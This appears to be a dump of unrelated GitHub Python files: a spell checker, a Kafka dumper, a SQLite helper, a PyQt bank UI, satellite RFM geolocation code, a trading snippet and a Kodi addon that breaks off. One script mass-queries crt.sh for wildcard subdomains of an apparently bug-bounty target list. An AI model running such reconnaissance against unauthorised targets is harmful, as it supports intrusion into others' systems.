else:
payload = {
'_callback': 'window.__jindo2_callback._spellingCheck_0',
'q': text
}
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
'referer': 'https://search.naver.com/',
}
r = _agent.get(base_url, params=payload, headers=headers)
r = r.text[42:-2]
data = json.loads(r)
html = data['message']['result']['html']
return html | SeongMyo/Spell_Checker_plus | utils/spell_checker.py | spell_checker.py | py | 2,669 | python | en | code | 0 | github-code | 36 |
75263396265 | import requests
from urllib.parse import urlparse
import concurrent.futures
# Extract domain from a URL
def extract_domain(url):
return urlparse(url).netloc
# Fetch subdomains from crt.sh
def get_subdomains_from_crtsh(domain):
try:
response = requests.get(f"https://crt.sh/?q=%.{domain}&output=json")
if response.status_code == 200:
json_data = response.json()
# Extract name_value (subdomain) from each certificate and filter wildcard entries
return [item['name_value'] for item in json_data if '*' in item['name_value']]
return []
except requests.RequestException:
return []
def main():
# Load domains from the input file
with open('h1_web_fix1.txt', 'r') as file:
urls = file.readlines()
domains = [extract_domain(url.strip()) for url in urls]
wildcard_subdomains = []
# Using ThreadPoolExecutor to speed up fetching subdomains
with concurrent.futures.ThreadPoolExecutor(max_workers=100) as executor:
future_to_domain = {executor.submit(get_subdomains_from_crtsh, domain): domain for domain in domains}
for future in concurrent.futures.as_completed(future_to_domain):
wildcard_entries = future.result()
wildcard_subdomains.extend(wildcard_entries)
# Save wildcard subdomains to an output file
with open('wildcard_subdomains.txt', 'w') as out_file:
for subdomain in wildcard_subdomains:
out_file.write(f"{subdomain}\n")
print(f"Found {len(wildcard_subdomains)} wildcard subdomains. Saved to wildcard_subdomains.txt.")
if __name__ == "__main__":
main()
| RepoRascal/test | run.py | run.py | py | 1,650 | python | en | code | 0 | github-code | 36 |
72753340263 | import json
import time
import os
import uuid
import argparse
from datetime import datetime, timedelta
from kafka import KafkaConsumer, SimpleConsumer
import os.path
import subprocess
def gzip_yesterday(yesterday):
#print "gzip_yesterday"
out = None
fname = args.target_folder+"/"+args.target_file+"_"+yesterday+".json"
if os.path.isfile(fname):
#check_call('gzip '+fname)
cmd = ("gzip__"+fname).split("__")
out = subprocess.check_output(cmd)
return out
def save():
#print "save"
# Kafka
consumer = KafkaConsumer(bootstrap_servers=args.kafka_bootstrap_srvs, group_id=args.kafka_group_id)
consumer.subscribe([args.kafka_source_topic])
for msg in consumer:
#
#print msg.value
indata = json.loads(msg.value)
#print indata
#
today = str(datetime.today())[0:10]
yesterday = datetime.strftime(datetime.now() - timedelta(1), '%Y%m%d')
#
#print today
#
file_name = args.target_folder+"/"+args.target_file+"_"+today.replace("-","")+".json"
with open(file_name, 'a') as the_file:
the_file.write(json.dumps(indata)+'\n')
#
if args.gzip_yesterday == "yes":
gzip_yesterday(yesterday)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Dump topic")
parser.add_argument('--kafka_bootstrap_srvs', default="localhost:9092")
parser.add_argument('--kafka_group_id', default="backup_topic")
parser.add_argument('--kafka_source_topic', default="good")
parser.add_argument('--target_folder', default="data")
parser.add_argument('--target_file', default="good")
parser.add_argument('--gzip_yesterday', default="yes")
#
args = parser.parse_args()
#
save()
| goliasz/kafka2bigquery | src/main/python/dump_topic.py | dump_topic.py | py | 1,687 | python | en | code | 0 | github-code | 36 |
35876191865 | import sqlite3
from sqlite3 import Error
class Key:
def __init__(self, key,content,info, database_path):
if database_path!="":
try:
self.key = key
self.database_path =database_path
if not self.check_key_exists():
if len(self.get_all__key(key))==0:
if key!="":
self.create_key(key,content,info)
else:
self.update_key(key,content,info)
except Error as e:
print(e)
def check_key_exists(self):
conn = sqlite3.connect(self.database_path)
cursor = conn.cursor()
cursor.execute("SELECT id FROM os WHERE key like '%'+?+'%'", (self.key,))
exists = cursor.fetchone()
conn.close()
if exists is None:
return False
else:
return True
def get_all__key(self, key):
a=[]
if self.database_path!="":
conn = sqlite3.connect(self.database_path)
if key!="":
cur = conn.cursor()
cur.execute("SELECT * FROM os", () )
rows = cur.fetchall()
for row in rows:
#print("s",row[1])
if key in row[1]:
a.append(row[1])
return a
return a;
def find_key_content(self, key):
conn = sqlite3.connect(self.database_path)
a=[]
if key!='':
cur = conn.cursor()
cur.execute("SELECT * FROM os WHERE key=?", (key,) )
rows = cur.fetchall()
for row in rows:
#print("s",row[2])
return row[2]
if key in row[2]:
a.append(row[2])
return a
def delete_key(self,key):
try:
conn = sqlite3.connect(self.database_path)
cursor = conn.cursor()
cursor.execute("DELETE FROM os WHERE key=?", (key,))
conn.commit()
conn.close()
except Error as e:
print(e)
def create_key(self,key,content,info):
try:
conn = sqlite3.connect(self.database_path)
cursor = conn.cursor()
print(str(len(self.get_all__key(key))))
if len(self.get_all__key(key))==0:
cursor.execute("INSERT INTO os (key,content,info) VALUES (?,?,?)", (key,content,info))
conn.commit()
conn.close()
except Error as e:
print(e)
def update_key(self,key,content,info):
try:
conn = sqlite3.connect(self.database_path)
cursor = conn.cursor()
cursor.execute("UPDATE os SET content=?,info=? WHERE key=?", (content,info,key))
conn.commit()
conn.close()
except Error as e:
print(e)
def get_key(self):
conn = sqlite3.connect(self.database_path)
cursor = conn.cursor()
cursor.execute("SELECT key FROM os WHERE key=?", (self.key,))
| dahstar/xwx.ctflab | fldb.py | fldb.py | py | 2,775 | python | en | code | 0 | github-code | 36 |
39939114136 | from PyQt5.QtWidgets import QTableWidgetItem, QLabel, QFileDialog
from PyQt5.QtCore import Qt
from pandas.tests.io.excel.test_xlrd import xlwt
from UI.resultWinUI import *
from algorithm import *
from UI.mainWinUI import *
class BrokerWin(Ui_MainWindow, QtWidgets.QMainWindow):
def __init__(self, parent=None):
QtWidgets.QWidget.__init__(self, parent)
self.setupUi(self)
self.setFixedSize(1100, 540)
self.fizButton.clicked.connect(self.sendInputFiz)
self.bizButton.clicked.connect(self.sendInputBiz)
self.selectAll.clicked.connect(self.selectAllFiz)
self.selectAll_2.clicked.connect(self.selectAllBiz)
def sendInputFiz(self):
banks.clear()
black_list.clear()
optional_fiz['Осуществление автоплатежей'] = self.autoPayments.isChecked()
optional_fiz['Перевод за рубеж'] = self.foreignTransfer.isChecked()
optional_fiz['Создание автоперевода'] = self.createAutoPayments.isChecked()
optional_fiz['Новости системы банка онлайн'] = self.news.isChecked()
optional_fiz['Автострахование'] = self.insuranceAuto.isChecked()
optional_fiz['Страхование недвижимости'] = self.insuranceEstate.isChecked()
optional_fiz['Страхование путешественников'] = self.insuranceTravellers.isChecked()
optional_fiz['Страхование пассажиров'] = self.insurancePassangers.isChecked()
optional_fiz['Наличие мобильного приложения'] = self.mobileApp.isChecked()
optional_fiz['Открытие брокерского счета'] = self.brokerAccount.isChecked()
ranked_fiz['Переводы на карту'] = self.transferToClient_fiz_SpinBox.value()
ranked_fiz['Минимальная сумма вклада'] = self.depositSum_fiz_SpinBox.value()
ranked_fiz['Процент по вкладу '] = self.persentDepozit_fiz_SpinBox.value()
ranked_fiz['Сумма кредита'] = self.creditSum_fiz_SpinBox.value()
ranked_fiz['Ставка кредита'] = self.percentCredit_fiz_SpinBox.value()
ranked_fiz['Переводы на карты по номеру телефона'] = self.transferNumber_fiz_SpinBox.value()
choose_necessary('fiz')
choose_ranked('fiz')
kind_of_sort = self.sort_fiz.currentText()
# self.close()
if kind_of_sort == "Пользовательскому рейтингу":
self.Open = ResultWin("По рейтингу")
elif kind_of_sort == "Кредитным условиям":
self.Open = ResultWin("по кредиту")
elif kind_of_sort == "Условиям по вкладам":
self.Open = ResultWin("по вкладу")
self.Open.show()
# print(special_sort('По рейтингу'))
def sendInputBiz(self):
banks.clear()
black_list.clear()
optional_biz['Мобильное приложение'] = self.mobileApp_biz.isChecked()
optional_biz['Торговый эквайринг'] = self.trade_biz.isChecked()
optional_biz['Мобильный эквайринг'] = self.mobileTrade_biz.isChecked()
optional_biz['Онлайн-бухгалтерия'] = self.onlineAccounting_biz.isChecked()
optional_biz['Проверка контрагентов'] = self.checkAgents_biz.isChecked()
optional_biz['Управление корпоративными картами'] = self.cards_biz.isChecked()
optional_biz['Финансовая аналитика'] = self.analitics_biz.isChecked()
optional_biz['Техподдержка клиентов 24/7'] = self.clientSupport_biz.isChecked()
optional_biz['Персональный менеджер'] = self.personalManager_biz.isChecked()
ranked_biz['Стоимость обслуживания'] = self.mounthPayment_biz_SpinBox.value()
ranked_biz['% за снятие наличных'] = self.cashComission_biz_SpinBox.value()
ranked_biz['% за внесение наличных'] = self.cashInputComission_biz_SpinBox.value()
ranked_biz['Лимит перевода на карту физ.лица'] = self.transfer_biz_SpinBox.value()
choose_necessary('biz')
choose_ranked('biz')
kind_of_sort = self.sort_biz.currentText()
# self.close()
if kind_of_sort == "Пользовательскому рейтингу":
self.Open = ResultWin("По рейтингу")
elif kind_of_sort == "Стоимости обслуживания":
self.Open = ResultWin("По обслуживанию в месяц")
self.Open.show()
def selectAllFiz(self):
self.autoPayments.setChecked(True)
self.foreignTransfer.setChecked(True)
self.createAutoPayments.setChecked(True)
self.news.setChecked(True)
self.insuranceAuto.setChecked(True)
self.insuranceEstate.setChecked(True)
self.insuranceTravellers.setChecked(True)
self.insurancePassangers.setChecked(True)
self.mobileApp.setChecked(True)
self.brokerAccount.setChecked(True)
def selectAllBiz(self):
self.mobileApp_biz.setChecked(True)
self.trade_biz.setChecked(True)
self.mobileTrade_biz.setChecked(True)
self.onlineAccounting_biz.setChecked(True)
self.checkAgents_biz.setChecked(True)
self.cards_biz.setChecked(True)
self.analitics_biz.setChecked(True)
self.clientSupport_biz.setChecked(True)
self.personalManager_biz.setChecked(True)
class ResultWin(Ui_ResultWindow, QtWidgets.QMainWindow):
def __init__(self, type_of_sort, parent=None):
QtWidgets.QWidget.__init__(self, parent)
self.setupUi(self)
self.setFixedSize(930, 900)
self.type_of_sort = type_of_sort
self.showResult()
def showResult(self):
result = special_sort(self.type_of_sort)
i = 0
self.sites=[]
information = pd.read_csv("files/banks_info.csv", encoding="cp1251", sep=";")
for key in result.keys():
for bank in result[key]:
self.tableWidget.insertRow(i)
label = QLabel()
item = QTableWidgetItem(str(key))
item.setTextAlignment(Qt.AlignHCenter)
self.tableWidget.setItem(i, 0, item)
self.tableWidget.setItem(i, 1, QTableWidgetItem(bank))
self.sites.append(information[bank][0])
label.setText('<a href="'+information[bank][0]+'">'+information[bank][0]+'</a>')
label.setOpenExternalLinks(True)
self.tableWidget.setCellWidget(i, 2, label)
self.tableWidget.setItem(i, 3, QTableWidgetItem(information[bank][1]))
item=QTableWidgetItem(information[bank][2])
item.setTextAlignment(Qt.AlignHCenter)
self.tableWidget.setItem(i, 4, item)
item = QTableWidgetItem(information[bank][3])
item.setTextAlignment(Qt.AlignHCenter)
self.tableWidget.setItem(i, 5, item)
i += 1
self.tableWidget.resizeColumnsToContents()
self.importButton.clicked.connect(self.savefile)
style = "::section {""background-color: #ffc02b; font:10pt; }"
self.tableWidget.horizontalHeader().setStyleSheet(style)
def savefile(self):
filename, _ = QFileDialog.getSaveFileName(self, 'Save File', '', ".xls(*.xls)")
wbk = xlwt.Workbook()
sheet = wbk.add_sheet("sheet", cell_overwrite_ok=True)
style = xlwt.XFStyle()
model = self.tableWidget.model()
for c in range(model.columnCount()):
text = model.headerData(c, QtCore.Qt.Horizontal)
sheet.write(0, c , text, style=style)
for c in range(model.columnCount()):
for r in range(model.rowCount()):
text = model.data(model.index(r, c))
sheet.write(r + 1, c, text)
for r in range(model.rowCount()):
text = self.sites[r]
sheet.write(r + 1, 2, text)
wbk.save(filename)
| JuliaZimina/Remote-Banking-Brokers | UI/brokerUI.py | brokerUI.py | py | 8,392 | python | ru | code | 0 | github-code | 36 |
33733841060 | from unittest import TestCase
from A3.SUD import fight_or_run
from unittest.mock import patch
class TestFightOrRun(TestCase):
@patch('builtins.input', side_effect=[0])
def test_fight_or_run_zero(self, mock_input):
actual = fight_or_run()
expected = 0
self.assertEqual(actual, expected)
@patch('builtins.input', side_effect=[1])
def test_fight_or_run_one(self, mock_input):
actual = fight_or_run()
expected = 1
self.assertEqual(actual, expected)
@patch('builtins.input', side_effect=[10])
def test_fight_or_run_10(self, mock_input):
actual = fight_or_run()
expected = 10
self.assertEqual(actual, expected)
@patch('builtins.input', side_effect=[100])
def test_fight_or_run_100(self, mock_input):
actual = fight_or_run()
expected = 100
self.assertEqual(actual, expected)
| marlonrenzo/A01054879_1510_assignments | A3/test_fight_or_run.py | test_fight_or_run.py | py | 901 | python | en | code | 0 | github-code | 36 |
17498679617 | import logging
import numpy as np
import sys
import warnings
import affine6p
import geopandas
from typing import List, Optional
from shapely.geometry import Polygon
import geoCosiCorr3D.georoutines.geo_utils as geoRT
import geoCosiCorr3D.geoErrorsWarning.geoErrors as geoErrors
from geoCosiCorr3D.geoCore.core_RFM import RawRFM
class ReadRFM(RawRFM):
def __init__(self, rfm_file):
super().__init__()
self.rfm_file = rfm_file
self._ingest()
def _ingest(self):
if self.rfm_file.endswith('xml') or self.rfm_file.endswith('XML'):
logging.info("RFM file format: xml")
self.RFM_Read_fromXML(self.rfm_file)
elif self.rfm_file.lower().endswith('RPB'):
logging.info("RFM file format: RPB")
self.RFM_Read_fromRPB(self.rfm_file)
elif self.rfm_file.lower().endswith(tuple(("txt", "TXT", "rpc"))):
# print("RFM file format: txt")
self.RFM_Read_fromTXT(self.rfm_file)
elif self.rfm_file.endswith(tuple(('TIF', 'NTF', "tif", "ntf", "JP2"))):
logging.info("RFM file format: Raster")
self.RFM_Read_fromRaster(self.rfm_file)
else:
try:
self.RFM_Read_fromTXT(self.rfm_file)
except:
raise IOError(f'RFM file:{self.rfm_file} is not valid')
def parse_file(self, param, lines):
from re import search
val = None
# print(param)
for line_ in lines:
if search(param, line_):
val = float(line_.split(":")[1].split()[0])
if val == None:
msg = "ERROR in reading " + param + " from RFM txt file!"
sys.exit(msg)
return val
def RFM_Read_fromTXT(self, rfm_txt_file):
with open(rfm_txt_file) as f:
fileContent = f.read()
lines = fileContent.split('\n')
self.linOff = self.parse_file(param="LINE_OFF", lines=lines)
self.colOff = self.parse_file(param="SAMP_OFF", lines=lines)
self.latOff = self.parse_file(param="LAT_OFF", lines=lines)
self.lonOff = self.parse_file(param="LONG_OFF", lines=lines)
self.altOff = self.parse_file(param="HEIGHT_SCALE", lines=lines)
self.linScale = self.parse_file(param="LINE_SCALE", lines=lines)
self.colScale = self.parse_file(param="SAMP_SCALE", lines=lines)
self.latScale = self.parse_file(param="LAT_SCALE", lines=lines)
self.lonScale = self.parse_file(param="LONG_SCALE", lines=lines)
self.altScale = self.parse_file(param="HEIGHT_SCALE", lines=lines)
### Inverse model
for i in range(20):
self.linNum[i] = self.parse_file(param="LINE_NUM_COEFF_" + str(i + 1) + ":", lines=lines)
self.linDen[i] = self.parse_file(param="LINE_DEN_COEFF_" + str(i + 1) + ":", lines=lines)
self.colNum[i] = self.parse_file(param="SAMP_NUM_COEFF_" + str(i + 1) + ":", lines=lines)
self.colDen[i] = self.parse_file(param="SAMP_DEN_COEFF_" + str(i + 1) + ":", lines=lines)
# print(self.linNum)
# TODO: check for direct model
return
def RFM_Read_fromXML(self, rfm_xml_file):
# TODO
logging.info("--- Read RFM form xML ---")
logging.info("--- Future work ---")
geoErrors.erNotImplemented(routineName="Read RFM from XML")
return
def RFM_Read_fromRPB(self, rpb_file):
# TODO
logging.info("--- Read RFM form RPB ---")
logging.info("--- Future work ---")
geoErrors.erNotImplemented(routineName="Read RFM from RPB")
return
def RFM_Read_fromRaster(self, raster_file):
## Read the RPC coefficent from raster tag using GDAL and georoutines.
rasterInfo = geoRT.cRasterInfo(raster_file)
if rasterInfo.rpcs:
rfmInfo = rasterInfo.rpcs
# print("RFM info :", rfmInfo)
## Scale and offset
self.altOff = float(rfmInfo["HEIGHT_OFF"])
self.altScale = float(rfmInfo["HEIGHT_SCALE"])
self.latOff = float(rfmInfo["LAT_OFF"])
self.latScale = float(rfmInfo["LAT_SCALE"])
self.lonOff = float(rfmInfo["LONG_OFF"])
self.lonScale = float(rfmInfo["LONG_SCALE"])
self.linOff = float(rfmInfo["LINE_OFF"])
self.linScale = float(rfmInfo["LINE_SCALE"])
self.colOff = float(rfmInfo["SAMP_OFF"])
self.colScale = float(rfmInfo["SAMP_SCALE"])
## Inverse model
self.linNum = list(map(float, rfmInfo['LINE_NUM_COEFF'].split()))
self.linDen = list(map(float, rfmInfo['LINE_DEN_COEFF'].split()))
self.colNum = list(map(float, rfmInfo['SAMP_NUM_COEFF'].split()))
self.colDen = list(map(float, rfmInfo['SAMP_DEN_COEFF'].split()))
## Direct model
if 'LON_NUM_COEFF' in rfmInfo:
self.lonNum = list(map(float, rfmInfo['LON_NUM_COEFF'].split()))
self.lonDen = list(map(float, rfmInfo['LON_DEN_COEFF'].split()))
self.latNum = list(map(float, rfmInfo['LAT_NUM_COEFF'].split()))
self.latDen = list(map(float, rfmInfo['LAT_DEN_COEFF'].split()))
else:
sys.exit(f'RPCs not found in the raster {raster_file} metadata')
return
class RFM(ReadRFM):
def __init__(self, rfm_file: Optional[str] = None, debug: bool = False):
self.init_RFM()
if rfm_file is not None:
super().__init__(rfm_file)
self.debug = debug
if self.debug:
logging.info(self.__repr__())
def Ground2Img_RFM(self, lon, lat, alt: List = None, normalized=False, demInfo=None, corrModel=np.zeros((3, 3))):
"""
Apply inverse RFM model to convert Ground coordinates to image coordinates
Args:
lon: longitude(s) of the input 3D point(s) : float or list
lat: latitude(s) of the input 3D point(s) : float or list
alt: altitude(s) of the input 3D point(s) : float or list
corrModel
Returns:
float or list: horizontal image coordinate(s) (column index, ie x)
float or list: vertical image coordinate(s) (row index, ie y)
"""
if alt is None:
alt = []
lon = np.asarray(lon)
lat = np.asarray(lat)
if np.array(alt).any() == True:
alt = np.asarray(alt)
else:
if demInfo is not None:
warnings.warn("INTERPOLATE FROM DEM --> TODO")
logging.warning("INTERPOLATE FROM DEM --> TODO")
else:
warnings.warn("NO alt values and no DEM: alt will be set to:{}".format(self.altOff))
logging.warning("NO alt values and no DEM: alt will be set to:{}".format(self.altOff))
alt = np.ones(lon.shape) * self.altOff
lonN = (lon - self.lonOff) / self.lonScale
latN = (lat - self.latOff) / self.latScale
altN = (alt - self.altOff) / self.altScale
colN = self.build_RFM(num=self.colNum, den=self.colDen, x=latN, y=lonN, z=altN)
linN = self.build_RFM(num=self.linNum, den=self.linDen, x=latN, y=lonN, z=altN)
if not np.all((corrModel == 0)):
colN, linN = self.apply_correction(corrModel=corrModel, colN=colN, linN=linN)
if normalized == True:
return colN, linN
else:
col = colN * self.colScale + self.colOff
row = linN * self.linScale + self.linOff
return col, row
def Img2Ground_RFM(self, col, lin,
altIni: Optional[List] = None,
demInfo: Optional[geoRT.cRasterInfo] = None,
corrModel=np.zeros((3, 3)),
normalized=False):
"""
Apply direct RFM model to convert image coordinates to ground coordinates
Args:
col: x-image coordinate(s) of the input point(s) : float or list
lin: y-image coordinate(s) of the input point(s) : float or list
altIni: altitude(s) of the input point(s) : float or list
normalized:
Returns: float or list: longitude(s) && float or list: latitude(s)
"""
if altIni is None:
altIni = []
if isinstance(altIni, list):
if len(altIni) == 0:
if isinstance(col, list) and isinstance(lin, list):
altIni = len(col) * [self.altOff]
else:
altIni = self.altOff
elif len(altIni) != len(col) or len(altIni) != len(lin):
ValueError("Invalid Initial Altitude values !")
col = np.asarray(col)
lin = np.asarray(lin)
altIni_ = np.asarray(altIni)
# Normalize input image coordinates
colN = (col - self.colOff) / self.colScale
linN = (lin - self.linOff) / self.linScale
altIniN = (altIni_ - self.altOff) / self.altScale
if self.lonNum == [np.nan] * 20:
if self.debug:
logging.warning("Computing Direct model ....")
# print("correction matrix:\n", corrModel)
# print("colN,linN,altN", colN, linN, altN)
lonN, latN = self.ComputeDirectModel(colN=colN, linN=linN, altN=altIniN, corrModel=corrModel)
else:
# print("Direct model provided in the RFM file will be used")
lonN = self.build_RFM(num=self.lonNum, den=self.lonDen, x=linN, y=colN, z=altIniN)
latN = self.build_RFM(num=self.latNum, den=self.latDen, x=linN, y=colN, z=altIniN)
if not normalized:
lon = lonN * self.lonScale + self.lonOff
lat = latN * self.latScale + self.latOff
# print(lon, lat, altIni)
# ==== Apply correction if exist =====
# if not np.all((modelCorr == 0)):
# lon, lat, altIni = ApplyCorrection(lon=lon, lat=lat, alt=altIni, col=col, lin=lin, modelCorr=modelCorr)
if isinstance(altIni, list):
alt = altIni
else:
alt = altIni
### Here we will use the computed lon & lat to interpolate the alt from the DEM if exist
if demInfo is not None:
alt = []
# TODO: loop until convergence or no change in coordinates
if isinstance(lon, np.ndarray) and isinstance(lat, np.ndarray):
for lonVal, latVal, altValIni in zip(lon, lat, altIni):
altVal = self.ExtractAlt(lonVal, latVal, demInfo)
if altVal == 0:
altVal = altValIni
alt.append(altVal)
else:
altVal = self.ExtractAlt(lon, lat, demInfo)
if altVal == 0:
altVal = altIni
alt = altVal
alt = np.asarray(alt)
# Normalize input image coordinates
colN = (col - self.colOff) / self.colScale
linN = (lin - self.linOff) / self.linScale
altN = (alt - self.altOff) / self.altScale
if self.lonNum == [np.nan] * 20:
# print("Computing Direct model ....")
# print("colN,linN,altN", colN, linN, altN)
lonN, latN = self.ComputeDirectModel(colN=colN, linN=linN, altN=altN, corrModel=corrModel)
else:
# print("Direct model provided in the RFM file will be used")
lonN = self.build_RFM(num=self.lonNum, den=self.lonDen, x=linN, y=colN, z=altN)
latN = self.build_RFM(num=self.latNum, den=self.latDen, x=linN, y=colN, z=altN)
lon = lonN * self.lonScale + self.lonOff
lat = latN * self.latScale + self.latOff
# lon, lat, alt = ApplyCorrection(lon=lon, lat=lat, alt=alt, col=col, lin=lin, modelCorr=modelCorr)
return lon, lat, alt
else:
return lonN, latN, None
def get_geoTransform(self):
h = int(self.linOff * 2)
w = int(self.colOff * 2)
BBoxPix = [[0, 0],
[0, h],
[w, h],
[w, 0],
[0, 0]]
z = self.altOff
lons, lats, _ = self.Img2Ground_RFM(col=[0, 0, w, w, 0],
lin=[0, h, h, 0, 0],
altIni=[z, z, z, z, z],
normalized=False)
BBoxMap = []
for lon_, lat_ in zip(lons, lats):
BBoxMap.append([lon_, lat_])
trans = affine6p.estimate(origin=BBoxPix, convrt=BBoxMap)
mat = trans.get_matrix() ## Homogenious represention of the affine transformation
geoTrans_h = np.array(mat)
geo_transform = [mat[0][-1], mat[0][0], mat[0][1], mat[1][-1], mat[1][0], mat[1][1]]
return geo_transform
def compute_footprint(self, corr_model: Optional[np.ndarray] = None,
dem_info: Optional[geoRT.cRasterInfo] = None) -> [Polygon, geopandas.GeoDataFrame]:
h = int(self.linOff * 2)
w = int(self.colOff * 2)
z = self.altOff
if corr_model is None:
corr_model = np.zeros((3, 3))
lons, lats, _ = self.Img2Ground_RFM(col=[0, 0, w, w, 0],
lin=[0, h, h, 0, 0],
altIni=[z, z, z, z, z],
normalized=False,
corrModel=corr_model,
demInfo=dem_info)
fp_poly_geom = Polygon(zip(lons, lats))
gpd_polygon = geopandas.GeoDataFrame(index=[0], crs='epsg:4326', geometry=[fp_poly_geom])
return fp_poly_geom, gpd_polygon
def get_GSD(self):
h = self.linOff * 2
w = self.colOff * 2
## Estimate GSD from RFM
center = (int(h / 2), int(w / 2))
center_plus = (center[0] + 1, center[1] + 1)
prjCenter = self.Img2Ground_RFM(col=center[1], lin=center[0])
prjCenter_plus = self.Img2Ground_RFM(col=center_plus[1], lin=center_plus[0])
## Estimate the UTM
epsgCode = geoRT.ComputeEpsg(lon=prjCenter[0], lat=prjCenter[1])
## Convert tot UTM projection
centerCoords = geoRT.ConvCoordMap1ToMap2_Batch(X=[prjCenter[1], prjCenter_plus[1]],
Y=[prjCenter[0], prjCenter_plus[0]],
targetEPSG=epsgCode)
xGSD = np.abs(centerCoords[0][0] - centerCoords[0][1])
yGSD = np.abs(centerCoords[1][0] - centerCoords[1][1])
return (xGSD, yGSD)
def get_altitude_range(self, scaleFactor=1):
"""
Args:
scaleFactor:
Returns:
"""
minAlt = self.altOff - scaleFactor * self.altScale
maxAlt = self.altOff + scaleFactor * self.altScale
return [minAlt, maxAlt]
if __name__ == '__main__':
# TODO add to unit/functional tests
img = '/home/cosicorr/0-WorkSpace/3-PycharmProjects/geoCosiCorr3D/geoCosiCorr3D/Tests/3-geoOrtho_Test/Sample/Sample1/SPOT2.TIF'
rfm = RFM(img, debug=True)
print(f'attitude range:{rfm.get_altitude_range()}')
print(f'GSD:{rfm.get_GSD()}')
print(f'geoTransform:{rfm.get_geoTransform()}')
| SaifAati/Geospatial-COSICorr3D | geoCosiCorr3D/geoRFM/RFM.py | RFM.py | py | 15,569 | python | en | code | 37 | github-code | 36 |
6411274184 | import json
from bitbnspy import bitbns
# from bitbnspy import bitbns
import config
key = config.apiKey
secretKey = config.secret
bitbnsObj = bitbns(key, secretKey)
# print('APIstatus: =', bitbnsObj.getApiUsageStatus)
# getPairTicker = bitbnsObj.getTickerApi('DOGE')
# print(' PairTicker : ', getPairTicker)
print('====================================')
# dumpBid = json.dumps(getPairTicker)
# loadBid = json.loads(dumpBid)
# getBid = loadBid['highest_buy_bid']
# print('highest buy: ', loadBid)
print('====================================')
# OpenOrders = bitbnsObj.listOpenOrders('DOGE')
# print(OpenOrders)
bitbnsObj = bitbns.publicEndpoints()
getTickers = bitbnsObj.fetchTickers()
dumpTickers = json.dumps(getTickers)
loadTickers = json.loads(dumpTickers)
print(loadTickers)
| npenkar/botCode | BitbnsPy/botbns.py | botbns.py | py | 788 | python | en | code | 0 | github-code | 36 |
9659602575 | import numpy
from abstract_model import Model
from asc.core.time_series import TimeSeries
class BrownModel(Model):
r"""
Class representing Brown's exponential smoothing model.
NOTES:
Brown's model is described by moving average `\hat{m_t}` \ for
`t=1,\dots, n`, which we can count with recursion:
.. MATH::
\hat{m_t} = a X_t + (1-a)\hat{m_{t-1}}
\hat{m_1} = X_1
for any `a \in [0,1].`
Thus for `t \ge 2`
.. MATH:
\hat{m}_t = \sum\limits_{j=0}^{t-2} a (1 - a)^j x_{t-j} + (1
- a)^{t-1} X_1
Paramet `a` we choose for trial and error method.
"""
obligatory_parameters = ("alpha", )
def __init__(self, data, alpha=0.3):
r"""
Initialize new instance of BronwModel class with given
parameters and
data.
:param data: data to constructed smoothened model.
:type data: TimeSeries.
:param alpha: the smoothing parameter of the model.
:type alpha: float.
"""
self._Model_forecast_offset = 1
super(BrownModel, self).__init__({"alpha": alpha}, data)
@property
def alpha(self):
r"""
Get smoothing parameter of this model.
:return: smoothing parameter of the model.
:rtype: float.
"""
return self.__alpha
@alpha.setter
def alpha(self, value):
r"""
Set new value of this model's smoothing parameter.
:param value: new value of smoothing parameter. ``value``
should lie in the interval [0,1].
:type value: float.
:raise: ValueError if value of alpha is greater than 1 or
lesser than 0.
"""
if 0 <= value <= 1:
self.__alpha = value
else:
raise ValueError("alpha must be a number from the interval [0,1].")
@property
def estimated_series(self):
r"""
Get series estimated from this model using data from which it
was
constructed.
:return: sequence of estimated values, i.e. smoothened time
series
given as the data parameter.
:rtype: TimeSeries.
"""
return self.__estimated_series
@property
def forecast_offset(self):
r"""
Get forecast offset of this model.
:return: forecast offset of this model. Forecast offset is
the time
after which model starts to estimate consequtive values
in
initial data. For Brown's model this is always 1.
:rtype: integer.
NOTES:
This method is included primarily to maintain
compatibility with
abstract model framework.
"""
return 1
def get_parameter(self, param):
r"""
Get value of given parameter in this model.
:param param: name of the parameter. The only valid value for
BrownModel is "alpha".
:type param: string.
:return: value of parameter ``param``.
:rtype: float.
:raise: ValueError if ``param`` is anything different than
"apha".
NOTES:
This method is included primarily to maintain
compatibility with
abstract model framework.
"""
if param == "alpha":
return self.alpha
raise ValueError("Unknown parameter %s." % (param))
def set_parameter(self, param, value):
r"""
Set value of a given parameter in this model.
:param param: parameter for which value should be set. The
only
valid value for Brown's model is "alpha".
:type param: float.
:param value: new value for the parameter. For parameter
alpha it
should be float in range from the interval [0,1].
:type value: float.
:raise: ValueError if ``param`` is anything different than
"alpha"
or if ``value`` doesn't lie in the interval [0,1].
NOTES:
This method is included primarily to maintain
compatibility with
abstract model framework.
"""
if param == "alpha":
self.alpha = value
else:
raise ValueError("Unknown parameter %s." % (param))
def recalculate_model(self):
r"""
Recalculate model. This method is used to calculate smoothed
values
from model's empirical data.
"""
sample_size = len(self.data)
m_t = numpy.zeros(sample_size - 1)
m_t[0] = self.data[0]
for k in range(sample_size - 2):
m_t[k + 1] = self.alpha * self.data[k + 1] + \
(1 - self.alpha) * m_t[k]
self.components = {}
self.components["smoothened"] = self.__estimated_series = \
TimeSeries(m_t)
self.components["residues"] = self.goodness_info.errors
| dexter2206/asc | source/asc-0.1/src/asc/models/brown_model.py | brown_model.py | py | 4,868 | python | en | code | 2 | github-code | 36 |
16389175671 | # -*- coding: utf-8 -*-
import os
import sys
import xbmcgui
import xbmcplugin
import xbmcaddon
from urllib.parse import parse_qsl
from libs.utils import get_url, check_settings
from libs.session import Session
from libs.channels import Channels, manage_channels, list_channels_edit, list_channels_list_backups, edit_channel, delete_channel, change_channels_numbers
from libs.channels import list_channels_groups, add_channel_group, edit_channel_group, edit_channel_group_list_channels, edit_channel_group_add_channel, edit_channel_group_add_all_channels, edit_channel_group_delete_channel, select_channel_group, delete_channel_group
from libs.live import list_live
from libs.archive import list_archive, list_archive_days, list_program
from libs.stream import play_live, play_archive, play_catchup
from libs.settings import list_settings, list_devices, remove_device
from libs.iptvsc import generate_playlist, generate_epg
if len(sys.argv) > 1:
_handle = int(sys.argv[1])
def main_menu():
addon = xbmcaddon.Addon()
icons_dir = os.path.join(addon.getAddonInfo('path'), 'resources','images')
list_item = xbmcgui.ListItem(label = addon.getLocalizedString(300111))
